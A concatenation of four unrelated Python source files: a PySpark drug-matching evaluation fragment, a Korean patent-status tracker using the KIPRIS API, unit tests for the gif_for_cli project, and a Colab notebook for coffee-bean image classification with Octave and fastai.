print("两轮判断TP总量 = " + str(ph_positive_prodict))
ph_positive_hit = ph_positive_hit + ph_positive_hit_se
print("两轮判断TP总正确数量 = " + str(ph_positive_hit))
# ph_negetive_hit = result.where(result.prediction != result.label).count()
if ph_positive_prodict_se == 0:
print("Pharbers Test set accuracy (两轮判断TP总比例) = 0")
print("Pharbers Test set precision (两轮判断TP总正确率)= 0")
else:
print("Pharbers Test set accuracy (两轮判断TP总比例) = " + str(ph_positive_hit / ph_total))
print("Pharbers Test set precision (两轮判断TP总正确率)= " + str(ph_positive_hit / ph_positive_prodict))
# 8. 第三轮
df_prediction_se = df_true_positive_se.select("id").distinct()
id_local_se = df_prediction_se.toPandas()["id"].tolist()
print(len(id_local))
id_local_total = id_local_se + id_local
print(len(id_local_total))
df_candidate_third = result.where(~result.id.isin(id_local_total))
count_third = df_candidate_third.groupBy("id").agg({"prediction": "first", "label": "first"}).count()
print("第三轮总量= " + str(count_third))
id_local_total = id_local_se + id_local
print(len(id_local_total))
df_candidate_third = result.where(~result.id.isin(id_local_total))
count_third = df_candidate_third.groupBy("id").agg({"prediction": "first", "label": "first"}).count()
print("第三轮总量= " + str(count_third))
df_third_round = df_candidate_third.drop("prediction", "indexedLabel", "indexedFeatures", "rawPrediction", "probability", "features")
dosage_mapping = spark.read.parquet("s3a://ph-max-auto/2020-08-11/BPBatchDAG/cpa_dosage_mapping/cpa_dosage_lst")
df_third_round.show(5)
df_third_round = df_third_round.join(dosage_mapping, df_third_round.DOSAGE == dosage_mapping.CPA_DOSAGE, how="left").na.fill("")
df_third_round = df_third_round.withColumn("EFFTIVENESS_DOSAGE_TH", dosage_replace(df_third_round.MASTER_DOSAGE, \
df_third_round.DOSAGE_STANDARD, df_third_round.EFFTIVENESS_DOSAGE))
df_third_round = df_third_round.withColumn("EFFTIVENESS_PRODUCT_NAME_SE", prod_name_replace(df_third_round.MOLE_NAME, df_third_round.MOLE_NAME_STANDARD, \
df_third_round.MANUFACTURER_NAME, df_third_round.MANUFACTURER_NAME_STANDARD, df_third_round.MANUFACTURER_NAME_EN_STANDARD))
assembler = VectorAssembler( \
inputCols=["EFFTIVENESS_MOLE_NAME", "EFFTIVENESS_PRODUCT_NAME_SE", "EFFTIVENESS_DOSAGE_TH", "EFFTIVENESS_SPEC", \
"EFFTIVENESS_PACK_QTY", "EFFTIVENESS_MANUFACTURER"], \
outputCol="features")
df_third_round = assembler.transform(df_third_round)
# df_second_round.repartition(10).write.mode("overwrite").parquet("s3a://ph-max-auto/2020-08-11/BPBatchDAG/refactor/alfred/second_round_dt")
predictions_third_round = model.transform(df_third_round)
predictions_third_round.write.mode("overwrite").parquet("s3a://ph-max-auto/2020-08-11/BPBatchDAG/refactor/zyyin/third_round_prediction1106_2")
evaluator = MulticlassClassificationEvaluator(labelCol="indexedLabel", predictionCol="prediction", metricName="accuracy")
accuracy = evaluator.evaluate(predictions_third_round)
print("Test Error = %g " % (1.0 - accuracy))
print("Test set accuracy = " + str(accuracy))
# 第二轮正确率检测
df_true_positive_th = predictions_third_round.where(predictions_third_round.prediction == 1.0)
ph_positive_prodict_th = df_true_positive_th.count()
<<<<<<<<< saved version
=========
print("机器判断第三轮TP条目 = " + str(ph_positive_prodict_th))
>>>>>>>>> local version |
<filename>source_code/patent_tracker.py
import asyncio
import time
import os
from datetime import datetime, date, timedelta
import aiohttp
from bs4 import BeautifulSoup
from typing import Union, List, Tuple, Iterator, Iterable, Dict
import openpyxl
from default_style import info_style, field_style, record_style, sheet_style
import string
api_key_path = "../input_setting/api_key.txt"
input_path = "../input_setting/input.xlsx"
output_directory = "../output"
## FYI ##
#current version: v1.0
#Comments & Docstring: English (for developers)
#print message: Korean (for consumers)
#TODO before 2.0:
# 1. Crwaling by Selenium -> (despite it's heaviness) Works without api_key.
# 2. More output formats: to_img(), to_csv()
class PatentTracker():
"""Creates PatentTracker instance.
Consists of 4 kinds of methods
I. GETTERS AND SETTERS: api_key, since, before, targets, results
II. SETTINGS AND INPUT: read_and_check_api_key, read_input
III. TRACKING: track_patents
IV. OUTPUT: to_excel and private methods
-- Quick Example --
tracker = PatentTracker()
time1 = time.time()
loop = asyncio.get_event_loop()
loop.run_until_complete(tracker.track_patents())
loop.close
time2 = time.time()
print(f"total time taken: {time2-time1}")
tracker.to_excel()
"""
def __init__(self):
self.__api_key: str = ""
self.__targets: Iterator = (i for i in [])
self.__since:date = date(1970,1,1)
self.__before:date = datetime.now().date()
self.__additional_info_dict: Dict = {}
self.__results: List = []
if os.path.exists(input_path): self.read_input(input_path)
else: raise FileNotFoundError(f"{input_path} 를 찾을 수 없습니다.")
if os.path.exists(api_key_path): self.read_and_check_api_key(api_key_path)
else: raise FileNotFoundError(f"{api_key_path}를 찾을 수 없습니다.")
############### I. GETTERS AND SETTERS ###############
@property
def api_key(self):
return self.__api_key
@api_key.setter
def api_key(self, api_key:str):
self.__api_key = api_key.strip()
print(f"tracker.api_key is now {self.__api_key}")
@property
def since(self):
return self.__since
@since.setter
def since(self, new_since):
if isinstance(new_since, datetime):
new_since = datetime.strftime(new_since, "%Y/%m/%d")
new_since = "/".join(new_since.split(" "))
new_since = "/".join(new_since.split("."))
new_since = "/".join(new_since.split("-"))
self.__since = datetime.strptime(new_since, "%Y/%m/%d").date()
print(f"tracker.since is set as {self.__since}")
@property
def before(self):
return self.__before
@before.setter
def before(self, new_before):
if isinstance(new_before, datetime):
new_before = datetime.strftime(new_before, "%Y/%m/%d")
new_before = "/".join(new_before.split(" "))
new_before = "/".join(new_before.split("."))
new_before = "/".join(new_before.split("-"))
self.__before = datetime.strptime(new_before, "%Y/%m/%d").date()
print(f"tracker.before is set as {self.__before}")
@property
def targets(self):
return self.__targets
@targets.setter
def targets(self, targets: List[str]):
weird_input = [target for target in targets if len(target) != 13]
if weird_input:
raise ValueError(
# "Some input elements does not satisfy condition." + "\n" +
# "Please check following elements and make sure they are 13 digit" +"\n" +
# f"{weird_input}"
"일부 타겟 정보가 올바르지 않습니다.\n"+
"아래 출원번호값들을 확인 해 주세요.\n"+
f"{weird_input}\n"+
"출원번호는 13자리 숫자 값이어야 합니다."
)
targets_gen = (target if len(target)==13 else "".join(target.split("-")) for target in targets)
self.__targets = targets_gen
print("타겟 입력 성공.")
# print("successfully fetched targets. ")
@property
def additional_info_dict(self):
return self.__additional_info_dict
@property
def results(self):
return self.__results
############### II. LOAD SETTINGS, INPUT ###############
def read_and_check_api_key(self, path:str, verbose=False):
with open(path, "r") as text:
api_key = text.readline()
if verbose: print("API key를 api_key.txt 로부터가져왔습니다.")
#print(f"Read api_key from api_key.txt as : {api_key}")
if self.check_api_key(api_key):
self.api_key = api_key
else:
print("읽어온 API key가 유효하지 않습니다. 기존 값으로 유지됩니다.")
print(f"읽어온 key 값: {api_key}")
print(f"현재 API key: {self.__api_key}")
#TODO:
def check_api_key(self, api_key):
# print(f"checking api_key vailidy")
# import urllib
# url = 'http://plus.kipris.or.kr/openapi/rest/RelatedDocsonfilePatService/relatedDocsonfileInfo'
# query = f'?applicationNumber=1019940701319&accessKey={api_key}'
# urllib.request(url+query)
return True
def read_input(self, input_path:str=input_path, verbose=False):
"""Reads file that contains input info and assigns properties using setters.
self.__targets, self.since, self.before will be assigned.
Argument(s)
- input_path:str = input_path
"""
targets:List[str] = []
additional_info_dict:Dict = {}
if os.path.exists(input_path):
wb = openpyxl.load_workbook(input_path) #Read xl file
if verbose: print(f"{input_path}로 부터 인풋 값을 불러옵니다.")
# Fetching application numbers from sheet 'targets'
try:target_sheet = wb['targets']
except KeyError:
print(f"{input_path} 에 'targets' 시트가 존재하지 않습니다.")
print("'Sheet2' 시트로 부터 타겟 정보를 불러옵니다.")
target_sheet = wb['Sheet1']
for row in target_sheet.iter_rows(min_row=3, max_row=5000, max_col=6, values_only=True):
if row[0] == None: continue
targets.append(str(row[0])) # application number.
additional_info_dict[str(row[0])] = row[1:] # additional info of target patent.
# print(f"출원번호 {row[0]} 및 추가정보를 읽어왔습니다.")
self.targets = targets #saved as generator
if verbose:
print(f"targets[:3]: {targets[:3]}")
print(f"self.targets: {self.targets}")
self.__additional_info_dict = additional_info_dict
if verbose:
print("타겟 정보를 성공적으로 불러왔습니다.")
print(f"타겟 수: {len(targets)}")
print(f"첫번째 타겟 출원번호: {list(self.additional_info_dict.keys())[0]}")
print(f"첫번째 타겟 부가정보: {list(self.additional_info_dict.values())[0]}")
# Reading date info from sheet 'dates'
try:dates_sheet = wb['dates']
except KeyError:
print(f"{input_path} 에 'dates' 시트가 존재하지 않습니다.")
# print("Current excel file doesn't have a sheet named 'dates'")
print(f"'Sheet2' 시트로 부터 날짜구간 정보를 불러옵니다.")
# print("worksheet 'Sheet2' will be open instead of worksheet 'dates'")
dates_sheet = wb['Sheet2']
last_n_day = abs(dates_sheet['C2'].value)
if last_n_day:
self.__before = datetime.now().date()
self.__since = self.__before - timedelta(days=last_n_day)
else:
self.since = dates_sheet['C3'].value
self.before = dates_sheet['C4'].value
else:
print(f"{input_path} 파일이 존재하지 않습니다.")
# print(f"file does not exist in the path: {input_path}")
############### III. TRACKING ###############
async def track_patents(self, verbose=False):
"""Asynchronously tracks patents in self.targets
Simply operates by repeating self.track_patent()
Saves a list containing tuples at self.__results.
[(application_number, result_2D_table), (...), ...]
"""
# returned values of each task will be appended into an empty list and then returned.
futures = [asyncio.ensure_future(self.track_patent(patent, verbose=verbose)) for patent in self.targets]
results = await asyncio.gather(*futures)
## this code will work synchronously -> compare with async
# results = []
# for patent in self.targets:
# results.append(await self.track_patent(patent))
# print(results)
self.__results = results
if verbose:
print(f"특허 트래킹 완료.")
print(f"첫 특허의 출원번호: {results[0][0]}")
print(f"첫 특허의 결과 테이블 일부: {results[0][1][:3]}")
async def track_patent(self, patent, verbose=False):
""" Requests information of a patent and filter_out unneccesary information.
Returns a 2-dimensional list.
"""
records = await self.request_and_parse_kipris_API(application_number = patent, api_key = self.api_key, verbose=verbose)
#print(f"records: {records}")
result_table = await self.filter_records(records, verbose=verbose)
# self.__result_dict[patent] = result_table
return (patent, result_table)
async def request_and_parse_kipris_API(self, application_number, api_key, verbose=False):
"""Request kipris REST API (asynchronously) and parse data using Beautifulsoup.
soup.findall("relateddocsonfileInfo") will be returned.
"""
url = 'http://plus.kipris.or.kr/openapi/rest/RelatedDocsonfilePatService/relatedDocsonfileInfo'
query = f'?applicationNumber={application_number}&accessKey={api_key}'
time1 = time.time()
if verbose: print(f"request for patent:{application_number} started.")
## request by requests and loop.run_in_executor
# import requests
# loop_ = asyncio.get_event_loop()
# response = await loop_.run_in_executor(None, requests.get, url+query)
# text= response.text
# request by aiohttp
async with aiohttp.ClientSession() as session:
async with session.get(url+query) as response:
text = await response.text()
time2 = time.time()
if verbose: print(f"request for patent:{application_number} finished. time:{time2-time1}")
# parse
soup = BeautifulSoup(text, "xml")
records = soup.find_all('relateddocsonfileInfo')
if records == []:
print("No records detected. Please check result message ")
print(f"result_message: {soup.find('resultMsg').text}")
return records
async def filter_records(self, records, verbose=False):
""" Filters out unnecessary records and fields.
Returns a 2-dimensional list.
"""
filtered_records = []
time1 = time.time()
for i, record in enumerate(records):
ymd = record.documentDate.text
record_date = date(int(ymd[:4]), int(ymd[4:6]), int(ymd[6:8]))
if record_date < self.since or record_date > self.before:
continue
else:
filtered_records.append([
i+1, #n-th record
record.documentTitle.text, #서류명
record.documentDate.text, #접수/발송 일자
record.status.text, #처리상태
record.step.text, #단계 (출원/등록 등.)
record.trialNumber.text, #심판 번호
record.registrationNumber.text #등록 번호
])
time2 = time.time()
if verbose: print(f"filtering records from a patent finished. time:{time2-time1}")
return filtered_records
############### OUTPUT ###############
def to_excel(self, verbose=False):
"""Saves result as an excel file(.xlsx)
"""
print(self.results)
if self.results == []:
print("결과 값이 없습니다. 엑셀파일을 생성하지 않고 종료합니다.")
#print("No results exists. Execute self.track_patents() to get results ")
return
# Create excel file
if verbose: print("엑셀 파일 작성을 시작합니다.")
result_wb = openpyxl.Workbook()
result_ws = result_wb.active
result_ws.title = 'result'
# Apply sheet_style
for letter in string.ascii_uppercase[:6]:
result_ws.column_dimensions[letter] = sheet_style[f"col_{letter}_width"]
current_row = 1
# Write data
for result in self.results:
application_number = result[0]
result_table = result[1]
self._write_title(result_ws, current_row, title="출원번호: "+ application_number)
current_row += 1
self._write_info(result_ws, current_row, additional_info=self.additional_info_dict[application_number])
current_row += 1
self._write_fields(result_ws, current_row)
current_row += 1
self._write_records(result_ws, current_row, records=result_table)
current_row += len(result_table)+2
# print(f"출원번호 {application_number} 의 결과테이블 작성 완료.")
#Save
timestamp = time.strftime("%y%m%d_%H%M%S")
output_name = output_directory + f"/output_{timestamp}.xlsx"
result_wb.save(output_name)
if verbose: print(f'엑셀 파일 {output_name} 저장을 완료했습니다.')
def _write_title(self, result_ws, current_row, title):
# default_title: application number.
result_ws.merge_cells(f'A{current_row}:F{current_row}')
result_ws[f'A{current_row}'].value = title
result_ws[f'A{current_row}'].style = info_style
def _write_info(self, result_ws, current_row, additional_info):
#result_ws[f'A{current_row}'].value = info_0
for i,j in enumerate('BCDEF'):
result_ws[f'{j}{current_row}'].value = additional_info[i] #info: from input.xlsx
for row in result_ws[f"A{current_row}":f"F{current_row}"]:
for cell in row:
cell.style = info_style
def _write_fields(self, result_ws, current_row):
fields = ["번호", "서류명", "접수/발송일자", "처리단계", "단계", "심판/등록 번호"]
for i,j in zip(fields, 'ABCDEF'):
result_ws[f'{j}{current_row}'].value = i
for row in result_ws[f"A{current_row}":f"F{current_row}"]:
for cell in row:
cell.style=field_style
# records = 2D array (list) n*5
def _write_records(self, result_ws, current_row, records):
for row in records:
number, document_title, document_date, status, step, trial_number, registration_number = row
for i,j in zip(row[:5],'ABCDE'): #번호, 서류명, 접수/발송일자, 처리상태, 단계
result_ws[f'{j}{current_row}'].value = i
if trial_number !=' ':
result_ws[f'F{current_row}'].value = trial_number #심판번호
elif registration_number !=' ':
result_ws[f'F{current_row}'].value = registration_number #등록번호
for row in result_ws[f"A{current_row}":f"F{current_row}"]:
for cell in row:
cell.style=record_style
current_row += 1
class DrugPatentTracker(PatentTracker):
#override __write_info
def _write_info(self, result_ws, current_row, additional_info):
item, authorization_holder, patent_holder, patent_class, patent_number = additional_info
result_ws[f'B{current_row}'].value = item #품목
result_ws[f'C{current_row}'].value = authorization_holder+"/"+patent_holder #허가권자/특허권자
result_ws[f'D{current_row}'].value = patent_class #특허구분
result_ws[f'F{current_row}'].value = patent_number #특허번호
for row in result_ws[f"A{current_row}":f"F{current_row}"]:
for cell in row:
cell.style = info_style
#as __write_info was overrode, to_excel also needs to be overidden
def to_excel(self, verbose=False):
"""Saves result as an excel file(.xlsx)
"""
if self.results == []:
print("결과 값이 없습니다. 엑셀파일을 생성하지 않고 종료합니다.")
#print("No results exists. Execute self.track_patents() to get results ")
return
# Create excel file
if verbose: print("엑셀 파일 작성을 시작합니다.")
result_wb = openpyxl.Workbook()
result_ws = result_wb.active
result_ws.title = 'result'
# Apply sheet_style
for letter in string.ascii_uppercase[:6]:
result_ws.column_dimensions[letter].width = sheet_style[f"col_{letter}_width"]
current_row = 1
# Write data
for result in self.results:
application_number = result[0]
result_table = result[1]
super()._write_title(result_ws, current_row, title=application_number)
current_row += 1
self._write_info(result_ws, current_row, additional_info=self.additional_info_dict[application_number])
current_row += 1
super()._write_fields(result_ws, current_row)
current_row += 1
super()._write_records(result_ws, current_row, records=result_table)
current_row += len(result_table)+2
# print(f"출원번호 {application_number} 의 결과테이블 작성 완료.")
#Save
timestamp = time.strftime("%y%m%d_%H%M%S")
output_name = output_directory + f"/output_{timestamp}.xlsx"
result_wb.save(output_name)
if verbose: print(f'엑셀 파일 {output_name} 저장을 완료했습니다.')
if __name__ == "__main__":
# tracker = PatentTracker()
wb = openpyxl.load_workbook(input_path) #Read xl file
ws = wb['output_type']
ouput_type = ws['C4'].value.strip().upper()
if ouput_type == "DRUG":
tracker = DrugPatentTracker()
elif False: #ouput_type == "SEMICONDUCTOR"
pass
else: #ouput_type == "NORMAL"
tracker = PatentTracker()
time1 = time.time()
loop = asyncio.get_event_loop()
loop.run_until_complete(tracker.track_patents(verbose=True))
loop.close
time2 = time.time()
print(f"total time taken: {time2-time1}")
tracker.to_excel(verbose=True) |
"""
Copyright 2018 Google LLC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import json
import unittest
from unittest.mock import patch, Mock
from PIL import Image
from gif_for_cli.generate.utils import (
avg,
get_gray,
get_256_cell,
get_truecolor_cell,
get_avg_for_em,
process_input_source,
)
from ..fixtures import empty_gif_response, gif_response
api_key = '<KEY>'
class TestAvg(unittest.TestCase):
def test_empty_input_raises_error(self):
with self.assertRaises(ZeroDivisionError):
avg([])
def test_single_int_in_float_out(self):
out = avg([1])
self.assertEqual(out, 1.0)
self.assertEqual(type(out), float)
def test_ints_in_float_out(self):
out = avg([1, 2])
self.assertEqual(out, 1.5)
self.assertEqual(type(out), float)
def test_floats_in_float_out(self):
out = avg([1.1, 2.2])
self.assertAlmostEqual(out, 1.65)
self.assertEqual(type(out), float)
class TestGetGray(unittest.TestCase):
def test(self):
self.assertAlmostEqual(
get_gray(0, 128, 255),
127.66666666
)
class TestGet256Cell(unittest.TestCase):
def test(self):
self.assertEqual(
get_256_cell(0, 128, 255),
u'\u001b[38;5;33m#'
)
class TestGetTruecolorCell(unittest.TestCase):
def test(self):
self.assertEqual(
get_truecolor_cell(0, 128, 255),
u'\u001b[38;2;0;128;255m#'
)
class TestGetAvgForEm(unittest.TestCase):
def setUp(self):
self.im = Image.new('RGB', (100, 100,))
self.px = self.im.load()
self.black = [0, 0, 0,]
self.white = [255, 255, 255,]
self.gray = [128, 128, 128,]
def assertColor(self, out, color):
self.assertEqual(out, color)
for v in out:
self.assertEqual(type(v), int)
def test_default_black_block(self):
out = get_avg_for_em(self.px, 0, 0, 2, 2)
out = get_avg_for_em(self.px, 0, 0, 2, 2)
self.assertColor(out, self.black)
out = get_avg_for_em(self.px, 2, 0, 2, 2)
self.assertColor(out, self.black)
out = get_avg_for_em(self.px, 0, 2, 2, 2)
self.assertColor(out, self.black)
out = get_avg_for_em(self.px, 2, 2, 2, 2)
self.assertColor(out, self.black)
def test_white_block(self):
self.im.putpixel((0, 0,), tuple(self.white))
self.im.putpixel((1, 0,), tuple(self.white))
self.im.putpixel((0, 1,), tuple(self.white))
self.im.putpixel((1, 1,), tuple(self.white))
out = get_avg_for_em(self.px, 0, 0, 2, 2)
self.assertColor(out, self.white)
out = get_avg_for_em(self.px, 2, 0, 2, 2)
self.assertColor(out, self.black)
out = get_avg_for_em(self.px, 0, 2, 2, 2)
self.assertColor(out, self.black)
out = get_avg_for_em(self.px, 2, 2, 2, 2)
self.assertColor(out, self.black)
def test_gray_block(self):
self.im.putpixel((0, 0,), tuple(self.white))
self.im.putpixel((0, 1,), tuple(self.white))
out = get_avg_for_em(self.px, 0, 0, 2, 2)
self.assertColor(out, self.gray)
out = get_avg_for_em(self.px, 2, 0, 2, 2)
self.assertColor(out, self.black)
out = get_avg_for_em(self.px, 0, 2, 2, 2)
self.assertColor(out, self.black)
out = get_avg_for_em(self.px, 2, 2, 2, 2)
self.assertColor(out, self.black)
def test_separate_color_channels(self):
color1 = (0, 128, 255,)
color2 = (255, 128, 0,)
self.im.putpixel((0, 0,), color1)
self.im.putpixel((1, 0,), color1)
self.im.putpixel((0, 1,), color1)
self.im.putpixel((1, 1,), color1)
self.im.putpixel((2, 0,), color1)
self.im.putpixel((3, 0,), color1)
self.im.putpixel((2, 1,), color2)
self.im.putpixel((3, 1,), color2)
out = get_avg_for_em(self.px, 0, 0, 2, 2)
self.assertColor(out, list(color1))
out = get_avg_for_em(self.px, 2, 0, 2, 2)
self.assertColor(out, self.gray)
out = get_avg_for_em(self.px, 0, 2, 2, 2)
self.assertColor(out, self.black)
out = get_avg_for_em(self.px, 2, 2, 2, 2)
self.assertColor(out, self.black)
@patch('os.path.exists')
@patch('gif_for_cli.generate.utils.requests')
class TestProcessInputSource(unittest.TestCase):
def set_mock_response(self, mock_requests, data, side_effect=False):
mock_response = Mock()
if side_effect:
mock_response.json.side_effect = data
else:
mock_response.json.return_value = data
mock_requests.get.return_value = mock_response
def test_file(self, mock_requests, mock_exists):
mock_exists.return_value = True
input_source = 'foo.gif'
processed_input_source = process_input_source(input_source, api_key)
self.assertEqual(processed_input_source, input_source)
self.assertEqual(mock_exists.call_count, 1)
self.assertEqual(mock_requests.get.call_count, 0)
def test_http_url(self, mock_requests, mock_exists):
mock_exists.return_value = False
input_source = 'http://example.com/foo.gif'
processed_input_source = process_input_source(input_source, api_key)
self.assertEqual(processed_input_source, input_source)
self.assertEqual(mock_exists.call_count, 1)
self.assertEqual(mock_requests.get.call_count, 0)
def test_https_url(self, mock_requests, mock_exists):
mock_exists.return_value = False
input_source = 'https://example.com/foo.gif'
processed_input_source = process_input_source(input_source, api_key)
self.assertEqual(processed_input_source, input_source)
self.assertEqual(mock_exists.call_count, 1)
self.assertEqual(mock_requests.get.call_count, 0)
def test_tenor_trending(self, mock_requests, mock_exists):
mock_exists.return_value = False
self.set_mock_response(mock_requests, gif_response)
input_source = ''
processed_input_source = process_input_source(input_source, api_key)
mpr_url = gif_response['results'][0]['media'][0]['mp4']['url']
self.assertEqual(processed_input_source, mpr_url)
self.assertEqual(mock_exists.call_count, 1)
self.assertEqual(mock_requests.get.call_count, 1)
def test_tenor_search(self, mock_requests, mock_exists):
mock_exists.return_value = False
self.set_mock_response(mock_requests, gif_response)
input_source = 'happy birthday'
processed_input_source = process_input_source(input_source, api_key)
mpr_url = gif_response['results'][0]['media'][0]['mp4']['url']
self.assertEqual(processed_input_source, mpr_url)
self.assertEqual(mock_exists.call_count, 1)
self.assertEqual(mock_requests.get.call_count, 1)
def test_tenor_search_empty_results(self, mock_requests, mock_exists):
mock_exists.return_value = False
self.set_mock_response(mock_requests, empty_gif_response)
input_source = 'happy birthday'
with self.assertRaises(Exception) as cm:
process_input_source(input_source, api_key)
self.assertEqual(cm.exception.args[0], 'Could not find GIF.')
self.assertEqual(mock_exists.call_count, 1)
self.assertEqual(mock_requests.get.call_count, 1)
def test_tenor_gif_id(self, mock_requests, mock_exists):
mock_exists.return_value = False
self.set_mock_response(mock_requests, gif_response)
input_source = '11313704'
processed_input_source = process_input_source(input_source, api_key)
mpr_url = gif_response['results'][0]['media'][0]['mp4']['url']
self.assertEqual(processed_input_source, mpr_url)
self.assertEqual(mock_exists.call_count, 1)
self.assertEqual(mock_requests.get.call_count, 1)
def test_tenor_gif_id_error_occurred(self, mock_requests, mock_exists):
mock_exists.return_value = False
self.set_mock_response(mock_requests, {'error': 'some error'})
input_source = '11313704'
with self.assertRaises(Exception) as cm:
process_input_source(input_source, api_key)
self.assertEqual(cm.exception.args[0], 'An error occurred: some error')
self.assertEqual(mock_exists.call_count, 1)
self.assertEqual(mock_requests.get.call_count, 1)
def test_tenor_gif_id_empty_json(self, mock_requests, mock_exists):
mock_exists.return_value = False
self.set_mock_response(mock_requests, {})
input_source = '11313704'
with self.assertRaises(Exception) as cm:
process_input_source(input_source, api_key)
self.assertEqual(cm.exception.args[0], 'Could not find GIF.')
self.assertEqual(mock_exists.call_count, 1)
self.assertEqual(mock_requests.get.call_count, 1)
def test_tenor_gif_id_exception_when_getting_json(self, mock_requests, mock_exists):
mock_exists.return_value = False
self.set_mock_response(mock_requests, Exception('some error'), side_effect=True)
input_source = '11313704'
with self.assertRaises(Exception) as cm:
process_input_source(input_source, api_key)
self.assertEqual(cm.exception.args[0], 'some error')
self.assertEqual(mock_exists.call_count, 1)
self.assertEqual(mock_requests.get.call_count, 1)
def test_tenor_gif_id_json_decode_error(self, mock_requests, mock_exists):
mock_exists.return_value = False
self.set_mock_response(mock_requests, lambda *args: json.loads('<'), side_effect=True)
input_source = '11313704'
with self.assertRaises(Exception) as cm:
process_input_source(input_source, api_key)
self.assertEqual(cm.exception.args[0], 'A server error occurred.')
self.assertEqual(mock_exists.call_count, 1)
self.assertEqual(mock_requests.get.call_count, 1)
def test_tenor_gif_url(self, mock_requests, mock_exists):
mock_exists.return_value = False
self.set_mock_response(mock_requests, gif_response)
input_source = 'https://tenor.com/view/the-matrix-gif-5437241'
processed_input_source = process_input_source(input_source, api_key)
mpr_url = gif_response['results'][0]['media'][0]['mp4']['url']
self.assertEqual(processed_input_source, mpr_url)
self.assertEqual(mock_exists.call_count, 1)
self.assertEqual(mock_requests.get.call_count, 1)
def test_tenor_broken_gif_url(self, mock_requests, mock_exists):
mock_exists.return_value = False
self.set_mock_response(mock_requests, gif_response)
input_source = 'https://tenor.com/view/the-matrix-gif'
with self.assertRaises(Exception) as cm:
process_input_source(input_source, api_key)
self.assertEqual(cm.exception.args[0], 'Bad GIF URL.')
self.assertEqual(mock_exists.call_count, 0)
self.assertEqual(mock_requests.get.call_count, 0)
|
# -*- coding: utf-8 -*-
"""octavemagic_extension.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1gKkzdaVQHmGNAQhh0IXG_LO4Mmk9vooC
# Coffee Bean Health Detection using Ocatve in ipynb.
## Installation
"""
!apt-get update
!apt install octave
# Commented out IPython magic to ensure Python compatibility.
!apt-get install liboctave-dev
!pip install oct2py
# %reload_ext oct2py.ipython
# Commented out IPython magic to ensure Python compatibility.
# %%octave
# pkg install -forge image
# pkg load image
"""## Overview
When using the cell magic, `%%octave` (note the double `%`), multiple lines of Octave can be executed together. Unlike
with the single cell magic, no value is returned, so we use the `-i` and `-o` flags to specify input and output variables. Also note the use of the semicolon to suppress the Octave output.
## Imaging
Image output is automatically captured and displayed, and using the `-f` flag you may choose its format (currently, `png` and `svg` are supported).
The width or the height can be specified to constrain the image while maintaining the original aspect ratio.
Multiple figures can be drawn. Note that when using imshow the image will be created as a PNG with the raw
image dimensions.
Plots can be drawn inline (default) or bring up the Octave plotting GUI by using the -g (or --gui) flag:
"""
import requests
img_data = requests.get('https://i.ibb.co/hd7gxky/IMG-5694.jpg').content
with open('coffee.jpg', 'wb') as handler:
handler.write(img_data)
from google.colab import drive
drive.mount('/content/gdrive')
!cd gdrive
!ls
# Commented out IPython magic to ensure Python compatibility.
# %%octave -s 1200,400 -f png
# a = imshow('coffee.jpg')
# Commented out IPython magic to ensure Python compatibility.
# %%octave -s 600,200 -f png
# bw_img = rgb2gray(imread('coffee.jpg'));
# figure
# imshow(bw_img)
# Commented out IPython magic to ensure Python compatibility.
# %%octave -s 600,200 -f png
# bin_img = imclearborder(imcomplement(im2bw(rgb2gray(imread('coffee.jpg')),0.5)));
# figure
# imshow(bin_img)
# Commented out IPython magic to ensure Python compatibility.
# %%octave
# I = max (phantom (), 0);
# figure; imshow (bw_img);
# title ("Original image");
# h = imhist (bw_img);
# t = otsuthresh (h);
# J = im2bw (imsmooth(bw_img, "Gaussian"));
# figure; imshow (J);
# title_line = sprintf ("Black and white image after thresholding, t=%g",
# t*255);
# title (title_line);
# Commented out IPython magic to ensure Python compatibility.
# %%octave -s 600,200 -f png
# new_bin_img = imclearborder(imcomplement(J));
# figure
# imshow(new_bin_img)
# Commented out IPython magic to ensure Python compatibility.
# %%octave
# thresharea = bwarea(bin_img)
#
# otsuarea = bwarea(new_bin_img)
# Commented out IPython magic to ensure Python compatibility.
# %%octave
# c = [1,12,146,410];
# r = [1,104,156,129];
# pixels = impixel(imread('coffee.jpg'),c,r)
# for i = 1:rows(pixels)
# disp(pixels(i,1)+pixels(i,2)+pixels(i,3))
# endfor
# Commented out IPython magic to ensure Python compatibility.
# %%octave -s 600,200 -f png
# dil_img = imdilate(imdilate(imdilate(bin_img,[1,1,1]),[1,1,1]),[1,1,1]);
# figure
# imshow(dil_img)
# Commented out IPython magic to ensure Python compatibility.
# %%octave -s 600,200 -f png
# erod_img = imerode(dil_img,[1,1,1]);
# figure
# imshow(erod_img)
# Commented out IPython magic to ensure Python compatibility.
# %%octave -s 600,200 -f png
# imshow(dil_img-erod_img)
# Commented out IPython magic to ensure Python compatibility.
# %%octave
# whos a
# Commented out IPython magic to ensure Python compatibility.
# %%octave
# t=imshow(edge(bw_img, "Sobel"))
# Commented out IPython magic to ensure Python compatibility.
# %%octave
# t=imshow(edge(bw_img, "Roberts"))
# Commented out IPython magic to ensure Python compatibility.
# %%octave
# t=imshow(edge(bw_img, "Prewitt"))
# Commented out IPython magic to ensure Python compatibility.
# %%octave
# k=imhist(g)
# length(k)
!pip install fastai
!ls
from google.colab import drive
drive.mount('/content/drive')
from fastai.vision import *
path = Path('/content/drive/My Drive/dip paper')
folder = ['Defected coffee beans', 'Mixed coffee beans ', 'Perfect coffee beans']
files = [x + '-coffee.csv' for x in folder]
cd drive
cd My\ Drive
cd dip\ paper
ls
for x in folder:
path1 = Path('./')
dest = path1/x
dest.mkdir(parents=True, exist_ok=True)
classes = ['inferior_batch', 'mediocre_batch', 'superior_batch']
np.random.seed(42)
data = ImageDataBunch.from_folder(path, train=".", valid_pct=0.2,
ds_tfms=get_transforms(), size=150, num_workers=4).normalize(imagenet_stats)
data.classes
data.show_batch(rows=3, figsize=(7,8))
learn = cnn_learner(data, models.resnet50, metrics=accuracy)
learn = cnn_learner(data, models.resnet34, metrics=accuracy)
learn.fit_one_cycle(2)
learn.fit_one_cycle(5, max_lr=slice(1e-4,1e-3))
learn.predict(data.test_dl)
interp = ClassificationInterpretation.from_learner(learn)
interp.plot_confusion_matrix() |
